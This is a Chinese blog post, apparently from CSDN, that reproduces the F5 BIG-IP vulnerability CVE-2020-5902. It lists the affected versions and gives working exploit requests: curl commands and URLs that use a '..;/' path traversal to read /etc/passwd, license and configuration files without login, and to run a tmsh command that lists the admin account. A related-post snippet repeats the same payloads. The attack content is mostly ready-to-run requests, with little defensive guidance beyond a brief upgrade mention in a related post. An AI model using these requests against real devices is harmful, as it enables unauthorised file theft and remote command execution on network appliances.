CVE-2020-5902 BIG-IP RCE漏洞复现

最新推荐文章于 2023-11-01 18:45:00 发布

原创最新推荐文章于 2023-11-01 18:45:00 发布 · 264 阅读

0 ·

CC 4.0 BY-SA版权

漏洞复现专栏收录该内容

21 篇文章

订阅专栏

本文介绍了一个影响多个F5版本的安全漏洞，包括远程代码执行(RCE)及文件读取漏洞。受影响的版本号包括11.6.x至15.1.x等。通过特定的curl命令，攻击者可以读取敏感文件如/etc/passwd，并尝试执行命令。

影响范围

版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

文件读取poc

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

在这里插入图片描述

RCE POC

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Min1996

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)

谢公子的博客

07-07

2150

F5 BIG-IP F5 BIG-IP Edge Gateway是一个接入解决方案，为远程用户提供了SSL VPN远程接入、安全性、应用加速和高可用性服务。 CVE-2020-5902 漏洞描述 2020年7月3日，未授权的远程攻击者通过向漏洞页面发送特制的请求包，可以造成任意Java代码执行。进而控制F5 BIG-IP的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等，该漏洞影响控制面板受影响，不影响数据面板。漏洞危害等级严重影响版本 BIG-IP

F5 BIG-IP远程代码执行漏洞复现（CVE-2020-5902）

玄道的网安博客

07-06

2223

前言 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。影响版本 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5 环境搭建在下面页面登录注册，之后申请秘钥 http

1 条评论您还未登录，请先登录后发表或查看评论

1 条评论

程序猿学长 2021.03.08
不错。

CVE-2020-5902 BIG-IP RCE漏洞复现&exp

Adminxe的博客

07-07

2582

0x01 漏洞简述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 0x02 漏洞详情未授权的远程攻..

【漏洞复现】F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)

qq_18193739的博客

11-01

1万+

未经授权的远程攻击者通过管理端口或自身IP地址访问BIG-IP系统，利用此漏洞可能绕过身份认证，导致在暴露流量管理用户界面（TMUI）的 F5 BIG-IP 实例上执行任意代码。

java 代码执行 export命令_F5 BIGIP 远程代码执行漏洞复现

weixin_39640444的博客

12-26

305

0x00 漏洞介绍F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日，F5官方公布流量管理用户界面(TMUI)存在前台远程执行代码(RCE)漏洞(CVE-2020-5902)。攻击者利用该漏洞，构造恶意请求，在未授权的情况下获得目标服务器的权限，实现远程代码执行。未授权的远程攻击者通过向该页面发送特制的请求...

F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)复现

m0_48520508的博客

11-18

1346

0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞，导致可以未授权访问TMUI模块所有功能（包括未公开功能），漏洞影响范围包括执行任意系统命令、任意文件读取、任意文件写入、开启/禁用服务等。 0x02漏洞概述攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取sh

F5 BIG-IP TMUI 远程代码执行漏洞（CVE-2020-5902）

box

07-24

901

一、漏洞详情近日，绿盟科技监测到F5官方对流量管理用户界面（TMUI）远程代码执行漏洞（CVE-2020-5902）的安全公告进行了更新。受影响的15.x版本变更为15.0.0-15.1.0，更新了可被绕过的临时缓解措施及验证方法；未经身份验证的攻击者通过BIG-IP管理端口或自身IP访问TMUI，可构造恶意请求获取目标服务器权限，CVSS评分为10分。目前msf已经集成了该漏洞的利用，建议还未修复的用户尽快采取措施进行防护。 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管

CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现

qq_32660043的博客

03-22

4640

CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现

F5 BIG-IP hsqldb(CVE-2020-5902)漏洞踩坑分析

晓得哥的博客

07-16

742

作者：Longofo@知道创宇404实验室时间：2020年7月10日English Version:https://paper.seebug.org/1272/ 原文链接：https://paper.seebug.org/1271/ F5 BIG-IP最近发生了一次比较严重的RCE漏洞，其中主要公开出来的入口就是tmsh与hsqldb方式，tmsh的利用与分析分析比较多了，如果复现过tmsh的利用，就应该知道这个地方利用有些鸡肋，后面不对tmsh进行分析，主要看下hsqldb的利用。hsqldb的利用.

(有下载链接)F5 BIG-IP 远程代码执行漏洞复现（CVE-2020-5902）

whojoe的博客

07-06

6047

F5 BIG-IP 远程代码执行漏洞复现（CVE-2020-5902）前言漏洞详情影响版本修复建议环境搭建漏洞复现参考文章前言漏洞详情 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包

[旧文系列] CVE-2020-5902: F5 BIG-IP RCE 漏洞复现与分析

mole_exp的博客

01-05

4399

文章目录关于<旧文迁移>1、前言2、搭建漏洞环境3、漏洞复现3.1 任意文件读取3.2 列出目录项3.3 RCE4、搭建漏洞调试环境5、漏洞分析5.1 坑5.2 漏洞原理Apache与Tomcat对分号 ; 的解析差异5.3 小结参考关于<旧文迁移> <旧文迁移>系列是笔者将以前发到其他地方的技术文章，挑选其中一些值得保留的，迁移到当前博客来。文章首发地址：hxxps://medium.com/@m01e/cve-2020-5902-f5-big-ip-rce-漏洞分

CVE-2020-5902 F5 BIG-IP 远程代码执行RCE

weixin_41082546的博客

07-06

293

cve-2020-5902 : RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

F5 BIG-IP TMUI 远程代码执行(CVE-2020-5902)

mei_13的博客

07-08

720

1.1 漏洞描述: 在F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日，F5官方公布流量管理用户界面（TMUI）存在前台远程执行代码（RCE）漏洞（CVE-2020-5902）。攻击者利用该漏洞，构造恶意请求，在未授权的情况下通过向漏洞页面发送特制的请求包，可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 1.2 影响范围

CVE-2020-5902（BIG-IP RCE）复现

thelostworld

07-06

1164

CVE-2020-5902（BIG-IP RCE）一、漏洞描述F5 BIG-IP是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制F5 BIG...

CVE-2020-5902（BIG-IP RCE）复现

thelostworld

07-06

431

CVE-2020-5902（BIG-IP RCE）一、漏洞描述 F5 BIG-IP是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制F5 BIG-IP的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。二、影响.

CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告

爱国小白帽

07-04

3786

CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞简述 2020年07月03日， 360CERT监测发现 F5 发布了 F5 BIG-IP 远程代码执行的风险通告，该漏洞编号为 CVE-2020-5902，漏洞等级：严重。未授权的远程攻击者通过向漏洞页面发送特制的请求包，可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令

Endeavour的博客

07-08

1813

认识F5 F5是一家国外安全厂商，主要安全产品是负载均衡,产品名字也叫F5，先来看一下设备登录页：相比国内的启明、绿盟的负载设备，F5设备个人认为是比较好用的，当然价格也不便宜，近期爆RCE漏洞是什么 ------cve-2020-5902 BIG-IP RCE漏洞简介 BIG-IP的TMUI存在RCE漏洞影响范围版本号主要如下 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x 修复方法升级 11.6.5.2, 12.1.5.2

CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞分析

爱国小白帽

07-15

1449

360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞简述 2020年07月08日， 360CERT监测发现 F5 官方更新了 F5 BIG-IP 远程代码执行的风险通告，该漏洞编号为 CVE-2020-5902，漏洞等级：严重。未授权的远程攻击者通过向漏洞页面发送特制的请求包，可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等，使用官方的httpd配置

深入分析CVE-2020-35728漏洞：Jackson-databind的RCE风险

资源摘要信息:"CVE-2020-35728是一个严重的安全漏洞，影响了FasterXML的jackson-databind库版本2.x，且该漏洞存在于2.9.10.8版本之前。该漏洞源于对序列化工具和类型间交互处理不当，尤其是与...